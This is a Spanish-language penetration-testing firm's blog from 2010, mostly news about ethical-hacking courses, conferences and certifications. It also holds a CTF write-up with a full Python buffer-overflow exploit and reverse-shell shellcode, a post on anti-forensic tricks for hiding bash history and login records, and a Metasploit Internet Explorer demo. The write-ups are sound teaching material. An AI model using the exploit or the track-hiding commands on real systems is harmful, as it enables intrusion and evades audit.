viernes, 10 de diciembre de 2010

OSEH @ HONDURAS

Excelentes personas, mucho buen nivel y una ciudad super agradable como lo es San Pedro de Sula.

Una excelente organización en manos de la Ing. Tania Pineda y el Dr. Daniel Bueso (lo pongo en segundo lugar no sólo por aquello de las damas primero sino porque es el esposo y ya sabemos que ellas son primero).
Ellos dirigen la Escuela Internacional de Negocios de Honduras.

Durante 3 días del mes de Noviembre tuvimos mucho aprendizaje de técnicas de hacking y al final conseguimos 6 nuevos OSEH.

Definitivamente, los retos son la mejor forma de medir el avance de los participantes a lo largo del entrenamiento.



Las imágenes a continuación muestran unos momentos de estos retos donde el equipo AspidaIgnis ganó el primer lugar.  Felicitaciones!



Tenemos planes de volver en el 2011 y otros países más en Centro América con entrenamientos de hacking y forensia computacional (OSFA).

Proximo post : LimaHack 2010...el cierre de año que tenia que ser.

viernes, 5 de noviembre de 2010

OSEH en Ecuador

Hola.

El tercer fin de semana del mes de Octubre (15,16,17) del presente estuvimos en la calurosa ciudad de Guayaquil para dictar el curso Open-Sec Ethical Hacker como parte del programa de estudio de la Maestria de Seguridad Informática Aplicada dictada en la ESPOL (Escuela Superior Politécnica del Litoral).

Luego de 3 intensivos dias de hacking, retos y buena comida concluimos el curso con una gran aceptación y despertar de interés por parte de los estudiantes de la maestria. Fruto del curso, 32 nuevas personas (y futuros masters en seguridad informática) cuentan con la certificación Open-Sec Ethical Hacker.

Desde aqui un saludo a los nuevos amigos que hicimos en Guayaquil. Espero poder retornar pronto para hacer otra parrillada :P.

Les dejo algunas imágenes.


Preparando los 52352352 USB's con una imagen de backtrack.

Concentración!

¿Cuál era el comando ?
Capture the Flag !!
MSIA

Para los interesados en este curso pueden encontrar más información en http://www.open-sec.com/oseh/oseh.html o escribiendo a info@open-sec.com.

Próximo destino del curso OSEH ?
Honduras !!!

Les cuento en otro post.

Saludos

Mauricio

sábado, 2 de octubre de 2010

Ekoparty 2010

Importado de : http://wcuestas.blogspot.com/2010/10/ekoparty-2010.html 

Esta fue una de las aventuras más simpáticas de los últimos tiempos. Ya el año pasado nos quedamos sin ir por la carga laboral y este año nos lanzamos.
Era importante para nosotros ir como team y para ver que tal estamos comparados con un medio tan avanzado y competitivo como el argentino, en otras palabras, que tan "hackers" somos y de hecho, el resultado fue positivo para nosotros, pero, hay que tener en cuenta que en Argentina no solamente hay buenos pen testers, ethical hackers, etc. sino excelentes investigadores y desarrolladores en seguridad informática. Mauricio Velazco se preguntaba : y ellos estan todo el día investigando para encontrar esas vulnerabilidades y desarrollar exploits ? La respuesta es SI porque allá hay empresas que se dedican a desarrollar herramientas de hacking, tanto como software libre como comercial. Ejemplo de todo ello son Core Impact (de Core Security), CANVAS (de Immunity) y la incorporación de w3af al "conglomerado" de Rapid7 que ya cuenta con MetaSploit, así como, Netifera y el ataque de Padding Oracle aplicado a la __viewstate de .Net donde el 50% del mérito lo tiene un argentino, Juliano Rizzo.
Aca nuestra investigación se da en forma posterior porque nos dedicamos a entender las vulnerabilidades reportadas y luego, a comprender como funcionan las herramientas o exploits lanzados, y, en algunos casos, para corregirlos o adecuarlos a nuestras necesidades (aunque ya tenemos 3 nuevas herramientas que lanzaremos este mes en el evento de ISACA el 22 de octubre).
A continuación la aventura Ekoparty en imágenes :
Perú estuve super presente en Ekoparty 2010.
Estuvimos 4 de Open-Sec, Juan Pablo, Felipe y Miguel (más datos omitidos a propósito).






La danza diabólica de las habitaciones compartidas.
Quién duerme con MV ? Por aca! Pero, luego encontró su pareja ideal : MU, durmieron juntos 3 noches y fueron felices por siempre. MV se quedó unos días más en Bs Aires haciendo los trámites del matrimonio.
(El del gesto diabólico no es ninguno de los M*).



Nos mandaron un mail diciendo que lleguemos a las 7:30 am., como buenos peruanos puntuales, llegamos a las 9:00 de la madrugada y quedó claro que argentinos y peruanos somos hermanos, más puntuales imposible!





El escenario de Ekoparty. El lugar donde se realiza es bien particular, hay que tener la mente bien abierta para encontrarle lo simpático, pero, el escenario como tal es buenísimo : un logo de Ekoparty en neón, un panel suficientemente grande, buen audio, una decoración entretenida, muy bueno.



A la izquierda : MV en el CtF. Lo curioso fue que alguien dijo : es un web! MV buscó, lo encontró y empezó a atacarlo. Rato después alguien le dice que era un web que estaba publicado en Internet y los retos eran de esos que solo entienden los creadores y sus amigos. Curiosamente, el web del reto terminó siendo "alterado". Quién habrá sido ?
A la derecha : MU, CC y JQ haciendo lockpicking que luego será aplicado en pruebas de seguridad física.
A la izquierda : seleccionando "exploits".

A la derecha : MU meditando sobre el padding oracle attack...oooommmm...ZZZZZZ




Dicen que la mejor defensa es el ataque, MV lo pone en práctica...



A la izquiera : peruanos en el subte.



A la derecha : reciclador tecnológico.






martes, 14 de septiembre de 2010

Ekoparty 2010

Mañana el equipo de Open-Sec estará viajando a Buenos Aires para la 6ta edición de la conferencia Ekoparty.

Estaremos posteando noticias y fotos por este medio.

Que la sigan rooteando !!!

domingo, 29 de agosto de 2010

Resolución 1er Reto How Strong Is Your Fu 2

Hola.

El 19 de Junio pasado tuvo lugar el segundo "How strong if your Fu", torneo de hacking organizado por los chicos de Offensive Security. Tuve la oportunidad de participar (haciendo team con Hackspy) y fue una experiencia bastante interesante. A diferencia de otros torneos, los de Offsec siempre son un tanto reales. (TRY HARDER !!)

En este post describiré la solución del primer reto (Vuln). Primero delineo brevemente el escenario utilizando el lenguaje telegráfico:

- VPN, 5 equipos
- Puertos descubiertos en el primer equipo : 22, 80, 7500
- Servidor Web lista un directorio con 2 archivos: vuln.c y vuln
- Viendo el source, vuln abre el puerto 7500.
- Funcion handle_reply() es vulnerable a buffer overflow.
- A explotar !!!

Todos los ficheros utilizados en este post pueden ser descargados aqui.

Dado que tenemos el fuente se hace fácil reconocer la cantidad de caracteres que permitirán el desbordamiento, sin embargo y para no perder la costumbre, escribimos un pequenho fuzzer.


Listo, al fuzzear vemos que alrededor de 280 bytes crean el desborde con su respectivo Segmentation Fault. Utilizando gdb para el debug, confirmamos que el registro EIP ha sido sobreescrito con el valor hexadecimal de "A" (41).


Al analizar ESP vemos que también estamos en control de este registro.



Ahora es necesario descubrir exactamente cuáles son los 4 bytes que sobreescriben el EIP para poder tomar control del flujo del proceso. En este caso utilizaremos a metasploit, en específico, las herramientas pattern_create y pattern_offset. Pattern_create crea una cadena con caracteres no repetidos y de un tamanho a eleccion, en nuestro caso, 280. Utilizamos esa cadena para enviarla al soft vulnerable y una vez sobreescrito el EIP utilizamos la herramienta pattern_offset para descubrir exactamente cuáles son los bytes que escribieron sobre EIP. Veámoslo en imágenes:



EIP fue sobreescrito con 0x6a413969 y utilizamos estos caracteres como entrada de pattern_offset:


Oka, ahora sabemos que a partir del byte 268 estamos sobreescribiendo el EIP. Otro problema: con que dirección sobreescribimos el registro EIP ? Sabemos que podemos controlar a ESP así que podemos poner la shellcode ahi y de alguna forma sobreescribir EIP para que "salte" a ESP (JMP ESP). Afortunadamente este ejecutable nos hace la vida más fácil dado que ya tiene una función jmp() que hace exactamente eso!

 int jmp(void){  
 __asm__("jmp %esp");  
 return 0;  

Lo que tenemos que hacer ahora es encontrar la dirección de memoria con el buen gdb.


Tenemos la dirección de la intrucción JMP ESP (0x08048703). Ya podemos empezar a crear el exploit y el buffer que enviaremos se verá algo asi:

   buffer= "A"*268 +  
   "\x03\x87\x04\x08" #JMP ESP  
   + shellcode       #Payload a elegir  



Por último, debemos elegir el payload. Metasploit nos ayuda una vez más con la herramienta msfpayload que permite generar shellcodes con distinto payload: conseguir shell, shell reversa, meterpreter reverso, etc, etc, etc. En este caso yo elegiré una shell reversa hacia el puerto 4444 :


Ahora todo listo, escribimos el exploit correspondiente y antes de ejecutarlo abrimos el puerto 4444 con netcat.



Voila!

Happy Hacking

Mvelazco

 ################################  
 #coded by mvelazco  
 #http://ehopen-sec.blogspot.com/  
 #mvelazco at open-sec.com  
 ################################  
 import socket  
 import struct  
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
 print "\nSending buffer..."  
 s.connect(('127.0.0.1',7500))  
 # Reverse shell port 4444 by metasploit  
 shellcode=("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"  
 "\x5b\x5e\x68\xc0\xa8\x28\x69\x66\x68\x11\x5c\x66\x53\x6a\x10"  
 "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"  
 "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"  
 "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"  
 )  
 buffer="A"*268  
 ret= "\x03\x87\x04\x08"  
 buffer+=ret + "\x90"*0 + shellcode  
 s.send(str(buffer) + '\r\n')  
 s.close()  
 print "EXPLOITATION DONE"  
 print "HAVE A NICE DAY :P"  


 #coded by mvelazco  
 #http://ehopen-sec.blogspot.com/  
 #mvelazco at open-sec.com  
 import socket  
 import time  
 buffer='\x41'*40  
 while len(buffer)<10000:  
   s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
   try:  
     s.connect(('127.0.0.1',7500))  
     print "fuzzing with "+ str(len(buffer)) + " bytes"  
     s.send(buffer + '\r\n')  
     buffer+='\x41'*50  
     s.close()  
   except:  
     print "Crashed!!"  
     break  

lunes, 23 de agosto de 2010

Seguridad en aplicaciones web bajo OWASP @ ISACA

Gracias a Wikipedia:
OWASP (Open Web Application Security Project) es un proyecto de código abierto dedicado a determinar y combatir las causas que hacen que el software sea inseguro. La comunidad OWASP está formada por empresas, organizaciones educativas y particulares de todo mundo. Juntos constituyen una comunidad de seguridad informática que trabaja para crear artículos, metodologías, documentación, herramientas y tecnologías que se liberan y pueden ser usadas gratuitamente por cualquiera.

Ya desde principios de este año, el capítulo peruano de OWASP se estuvo organizando y tuvimos las primeras reuniones. Este martes 24 de Agosto se tendrá la primera presentación de OWASP Perú en la reunión mensual de ISACA. Les dejo los detalles, nos vemos ahi:

Saludos,
MVelazco.

Objetivos:
  • Conocer el marco normativo para el desarrollo e implementación de aplicaciones web seguras.
  • Mostrar algunas técnicas para el diseño, desarrollo e implementación de aplicaciones web seguras.
Expositores de OWASP Lima:
  • John Vargas Pérez, Consultor de Seguridad Informática, Visiontech del Perú.
  • Rolando Antón Huerta, Ingeniero de Soporte, ETEK Internacional.
  • Mauricio Velazco Corrales, Consultor de Seguridad Informática, OpenSec.
  • Ricardo Supo Picón, Chief Technology Officer, LimaSoft Seguridad Informática
Fecha: Martes 24 de agosto, de 7 a 9 pm.
Lugar: Hotel José Antonio, Miraflores
Informes e Inscripciones:
Tel. 225-9342 - eMail: informacion@isaca.org.pe Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla  - Contacto administrativo: Srta. Mabel Gil

miércoles, 21 de julio de 2010

OSEH en Tarapoto

Hace unos meses recibí una invitación de la universidad César Vallejo para dictar el curso Open-Sec Ethical Hacker (http://www.open-sec.com/oseh/oseh.html) en la calurosa ciudad Tarapoto.

Terminado el curso se organizó un seminario en donde se conversó de algunos temas de hacking (para variar) y además compartí la exposición con Felipe Gonzáles, un estudiante de la universidad que dió una interesante charla sobre el análisis de malware.

Siempre es interesante encontrar personas inquietadas por estos temas que muchas veces nos quitan el sueño.

Les dejo algunas fotos,


MVelazco.


miércoles, 23 de junio de 2010

Más Certificaciones! Offensive Security Certified Professional = Cesar Cuadra Pacheco

Cada logro personal de un consultor en Open-Sec es recibido con mucho entusiasmo por todos nosotros y al logro reciente de Mauricio Velazco con al certificación de C|EH, hoy (ayer) debemos sumar el logro de Cesar Cuadra al haber obtenido la certificación de OSCP : Offensive Security Certified Professional.

Para los que no conocen esta certificación, es sumamente reconocida en el mundo de los hackers y ha sido creada y es manejada por los mismos creadores de BackTrack.
El examen no es convencional, es un Capture the Flag completo.  A Cesar le tocó entrar a un entorno real y vulnerar la seguridad de servicios para obtener trofeos a partir de ello y asi poder demostrar su capacidad en labores de ethical hacking en un lapso de 24 horas.  Alcanzó el puntaje perfecto de 100 puntos!!!
Definitivamente, Cesar es uno de los mejores hackers éticos que existen en nuestro país.
FELICITACIONES CESAR!!!

viernes, 11 de junio de 2010

Open-Sec Ecuador nombrado ATC de EC Council

Esto constituye un gran logro de Ramiro Pulgar, Gerente General de Open Sec Ecuador toda vez que el tema de entrenamiento y certificacion en Ecuador es tomado con mayor interés y tanto las empresas como las personas invierten en formarse y mantenerse vigentes demostrando sus capacidades con certificaciones internacionales.
Mediante este acuerdo, Open Sec es un ATC exclusivo  en Ecuador y dentro de su territorio de venta y entrenamiento se encuentra también Perú.
Pronto más novedades concretas como próximas fechas y MEJORES precios.
http://www.concepti.com/centros-autorizados/23/open-sec-ecuador

lunes, 10 de mayo de 2010

Peruvians at Offsec !!

Hace ya unas semanas la gente de Offensive Security publicó información sobre un torneo de hacking bastante interesante. El torneo fue llevado a cabo desde el sábado 8 de mayo hasta hoy. Básicamente consistió en 2 fases. La primera, como la llamaron ellos, el n00b filter, que consistía ownear un equipo y luego buscar un fichero en el sistema de archivos y utilizar esa llave.
Tan sólo los 100 primeros en pasar la fase 1 podían recibir el certificado para conectarse a la VPN y jugar la fase 2 en donde encuentras varios otros equipos y la idea es to get root.

Con el estudio, el dia de la madre y la chamba no hubo mucho tiempo para jugar, sin embargo llegamos (CCuadra,WCuestas y yo) a pasar la fase 1, obteniendo así 25 puntos.
Además, me es grato saber que otro peruano, Andrés Morales logró ownear algunos equipos de la vpn logrando obtener 75 puntos.
Peruvians in the scoreboard!!



La fase 1 consistía en explotar una vulnerabilidad de un WAF conocido que permite la ejecución de comandos remota. Aquí dejo algunos screenshots del exploit que escribi para superar el reto. He omitido alguna info dado que aun no hay un pronunciamiento oficial por parte de Offsec sobre la solución del reto.



Saludos

MVelazco

An score of 98% says that Mauricio Velazco is a Certified Ethical Hacker by EC Council...3 C|EH @ Open-Sec and counting...

Para nosotros es un tema bien importante el reconocimiento a quienes demuestran feacientemente su conocimiento y el hecho que Mauricio Velazco haya obtenido el dia de hoy la certificacion de C|EH es muy importante por varias razones :
1. Es el miembro mas joven de nuestro equipo y afaik, es el C|EH mas joven en Perú con 24 años.
2. Ya lleva cerca de 2 años haciendo unicamente ehtical hacking y computación forense y el puntaje obtenido en el examen demuestra que su experiencia ayudo mucho para el examen (no llevo un curso o similar).
3. Open-Sec resulta siendo la unica empresa local que cuenta con 3 C|EH en staff permanente.
4. Este es solamente el inicio de una saga de certificaciones que obtendra Mauricio, hoy conversabamos sobre la proxima, CPTE.

FELICITACIONES MAURICIO!!!

UPDATE : El día de ayer también obtuvo su certificación como C|EH el consultor Rolando Antón.  El no es parte del equipo de Open-Sec, es parte del equipo de Etek Perú, pero, es un gran amigo nuestro y mio en particular.
Dado que hoy día Mauricio Velazco cumplió 25 años, desde hoy hasta octubre de este año, Rolando es el C|EH peruano más joven (AFAIK).

FELICITACIONES ROLANDO!!!!

lunes, 19 de abril de 2010

Charla Ethical Hacking 2008 en PUCP

Este video lo teniamos en el web antiguo y por alguna razon, algunas personas lo reclamaron, sera porque les sirve o porque les resultad divertido. Como update, Carlos Renzo (el mayorcito de los 3) ya no trabaja con nosotros, pero, seguimos siendo excelentes amigos.

miércoles, 7 de abril de 2010

Linux Week y MS10_002

Hace unas semanas, me invitaron a dar una charla en la quinta edicion de Linux Week que se realizo en la semana del lunes 15 hasta el viernes 19 de marzo en las instalaciones de la PUCP. Desde aqui quiero felicitar a los organizadores y agradecerles por la invitacion y el buen trato.

El tema que toque en esa oportunidad fue ataques de lado cliente en donde basicamente hablamos sobre las tendencias de los atacantes, se expuso algunos de los "ataques" mas frecuentes que vienen ocurriendo para el robo de credenciales como lo son el Phishing y el Pharming. Lo ultimo, para que los asistentes tengan conciencia de las consecuencias si no se tiene algunos criterios minimos al momento de ingresar a una url no conocida o aceptar un archivo posiblemente malicioso.

Terminamos hablando un poco sobre los relativamente recientes ataques contra Google, la denonimada "Operacion Aurora". Fue en este ultimo punto donde realice una pequeña demo donde explote la vulnerabilidad antes mencionada, una vulnerabilidad de corrupcion de memoria que afecta a Internet Explorer
en sus versiones 6 y 7. Mediante esta, un atacante crea un HTML con un codigo javascript malicioso, que al ser interpretado por un navegador afectado, permitira tomar control total del equipo. Para probar el exploit, use Metasploit.

Una vez explotada la vulnerabilidad, el payload utilizado dependera de la vida del proceso asociado. Esto es debido a que una vez llamada la shellcode, la sesion meterpreter es cargada en el espacio de memoria asignado al proceso explotado, en este caso, iexplorer.exe. Si el navegador se cuelga por el ataque o si la victima simplemente deja de navegar y cierra el Internet Explorer, se libera la memoria, ergo, perdemos la sesion.

Para evitar este escenario, metasploit nos facilita la vida con la funcionalidad de migrar de proceso. Podemos automatizar esto escribiendo un script para que una vez conseguidos los privilegios, creemos un nuevo proceso y migremos a este. Tan solo seteamos el valor AutoRunScript.


Aqui les dejo el script utilizado



Ah, y la presentacion.


Saludos!

MVelazco.

P.D: Tildes omitidas intencionalmente

viernes, 2 de abril de 2010

GPEN versus GCIH : Una pequeña, pero, IMPORTANTE DIFERENCIA

En un medio con el nuestro (Perú) donde las certificaciones en tema de seguridad estan en la etapa 0 (apenas algunos se han certificado y no es exigencia para realizar labores relacionadas), resulta importante hacer siempre precisiones y dado el prestigio del entrenamiento de SANS y las certificaciones de GIAC, es importante comprender algunas diferencias y no dejar que nos den gato por liebre.

En diás pasados se aperturó una lista de correo para un grupo de personas con certificaciones de GIAC o alumnis de SANS respecto a ciertos cursos (relacionados los 3 a penetration testing) y luego se aperturó a los certificados y alumnis de manejo de incidentes.  Esto dió lugar a unas opiniones de los creadores, gestionadores e instructores de estos cursos de las cuales se puede extraer :

"504 is more geared to incident response than penetration testing." -Ed Skoudis
(504 es el código del curso que conduce a la certificación GCIH)

"Thanks for including 504.  I took 504 and then tried my new skills out by
attempting an internal pen test against my environment (with written
permission, of course!) and found I was lacking.  Although I had the tools
and some skills, the 560 class brought it all together for me as far as a
formal procedure of defining a scope and compiling a report.  I think 504
and 560 should be taught together in a two-week SANS Ultra Brain Dump Uber
Course.  They certainly complement each other. "
- Tony K. Reusser
(560 es el código del curso que conduce a la certificación GPEN).

miércoles, 10 de marzo de 2010

4 Nuevos OSEH (Open-Sec Ethical Hacker)

El fin de semana último realizamos otro curso de ethical hacking donde enseñamos las técnicas de ataque que aplicamos en los servicios que realizamos.
Es interesante como los participantes poco a poco van engarzando las diferentes etapas de una penetración de forma casi natural.
Tuvimos especial énfasis en temas de hacking de aplicaciones web, incluso, Camilo Galdos (Dr. White) participó dando una charla al respecto.  Obviamente, los participantes quedaron sorprendidos por su juventud y capacidad.
También, tuvimos otra vez un laboratorio en particular sobre hacking de redes wifi.
Así mismo, los participantes pudieron analizar los hechos del "defacement" que sufrimos, aprender a diferencia un verdadero defacemente de un "defacemente", conocer sobre los autores y complices, los "motivadores", analizar "evidencias" públicas y comprender como no siempre las cosas son lo que parecen.
Al final, se llevó a cabo la evaluación con el examen de OSEH que nos permite contar con 4 personas más que han certificado el contar con un nivel elemental en temas de ethical hacking (ya llevamos 30 certificados).
A continuación, algunas imágenes :

viernes, 19 de febrero de 2010

Metagoofil enhanced

Como verán, estamos siendo más productivos con el blog (será porque se acerca el 2012 y queremos ser famosos ? jejeje...).

Siempre hemos dicho en presentaciones, en conversaciones con los clientes y en los entrenamientos que para nosotros usar herramientas Open Source es vital porque podemos modificarlas según necesitemos sin esperar que el proyecto que las origina lo haga y seria peor si se tratáse de herramientas comerciales o simplemente gratuitas (pero, a cuyo código fuente no tenemos acceso).

Una de las primeras herramientas que modificamos para manejar adecuadamente algunos cambios en Google y algunas formas de búsqueda es metagoofil, herramienta desarrollada y mantenida por Edge-Security Research y la cual hemos modificado "ligeramente" (incluso, los remito al web de ellos para revisar la excelente documentación creada para esta t00l http://www.edge-security.com/metagoofil.php )

Por favor, como siempre les decimos a todos : descarguen esta versión, revisen el código, asegurense que no tiene un troyano o similar y luego de eso, usenla.

El programa esta comentado para un mejor entendimiento.

Descarga : Metagoofil.py

martes, 16 de febrero de 2010

Hiding Tracks with .bash_profile

 Buscando maneras en las que un atacante puede minimizar sus huellas en un sistema *nix comprometido, encuentro, gracias a MUrizar, con una simple y eficaz forma de hacerlo.

Al añadir una línea al fichero .bash_profile (tambien funciona en .bashrc), podemos lograr que todo comando precedido de un espacio en blanco, no sea guardado en el historial de comandos del usuario (.bash_history).

export HISTCONTROL=ignorespace

Esto puede funcionar en un escenario donde se quiera evitar el uso de rootkits o zappers para borrar evidencias. Hay otras formas de hacerlo pero me gustó esta por su simplicidad. Lo importante es no olvidarse de añadir el espacio en blanco !

Desde luego, esto no servirá de nada para ocultar la presencia del atacante si el admin utiliza comandos como w, who, users, last y lastlog que mostrarán información sobre usuarios y sus logins. Una manera de evitar esto sería modificando los ficheros parseados por estos comandos para mostrar su output:

/var/run/utmp
/var/log/wtmp

Tal ves eso para otra ocasión,


MVelazco

Update 1

Conversando con WCuestas y buscando evitar añadir un espacio en blanco antes de todo comando ingresado, me sugiere una forma mucho más práctica de realizar la misma tarea sin tener que hacer cambios en ningún archivo.

Nos enfocamos en 2 variables de entorno de bash, $HISTSIZE y $HISTFILE. Cada una guarda el valor del número de líneas guardados en el historial y el fichero donde se guardará el historial, respectivamente.
Una imagen vale más:



Bien, entonces jugando con esas variables podemos conseguir que en una nueva sesión, no se guarde historial de comandos ejecutando lo siguiente:

HISTSIZE=0; export HISTSIZE
HISTFILE=/dev/null; export HISTFILE

Lo interesante es que en la próxima sesión, las variables serán cargadas según lo dictado en .bashrc, así que para el admin todo esto es transparente, aqui no paso nada!.